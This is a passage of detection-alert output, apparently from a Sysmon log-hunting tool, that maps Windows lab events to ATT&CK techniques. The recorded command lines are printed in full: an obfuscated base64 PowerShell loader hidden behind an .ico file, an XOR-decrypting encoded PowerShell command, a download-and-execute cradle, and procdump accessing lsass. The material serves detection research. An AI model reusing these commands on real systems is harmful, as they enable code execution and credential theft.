\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448 + 365ABB72-FE6C-5CEB-0000-00104A170C00 + 3680 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( "C:\Windows\system32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16498 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:50.852 + 365ABB72-517E-5CD8-0000-00105FE01700 + 2920 + C:\Windows\System32\calc.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\calc.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1 + 365ABB72-517E-5CD8-0000-001024D61700 + 2952 + C:\Windows\System32\pcalua.exe + "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 374 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 00:35:07.386 + 365ABB72-47BB-5CE3-0000-001071AD3E00 + 3944 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /c test.bat + C:\Users\IEUser\Downloads\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-47BB-5CE3-0000-0010BFA83E00 + 1912 + C:\Users\IEUser\Downloads\com-hijack.exe + "C:\Users\IEUser\Downloads\com-hijack.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966252 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:36:04.226 + 365ABB72-52B4-5C91-0000-0010D55B0100 + 1636 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 4434 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 19:09:41.328 + 365ABB72-9B75-5C8E-0000-0010013F1200 + 1856 + 980 + C:\Users\IEUser\Desktop\procdump.exe + 365ABB72-0886-5C8F-0000-001030560000 + 476 + C:\Windows\system32\lsass.exe + 0x1fffff + C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine ("C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10675 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.661 + 747F3D96-FBCA-5D53-0000-001036784100 + 2876 + C:\Windows\System32\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5901 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.771 + 365ABB72-3D6D-5CEB-0000-00100478FF00 + 3444 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6190 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.515 + 365ABB72-FE76-5CEB-0000-001077710C00 + 2840 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16497 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:50.781 + 365ABB72-517E-5CD8-0000-001024D61700 + 2952 + C:\Windows\System32\pcalua.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4912 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.380 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image 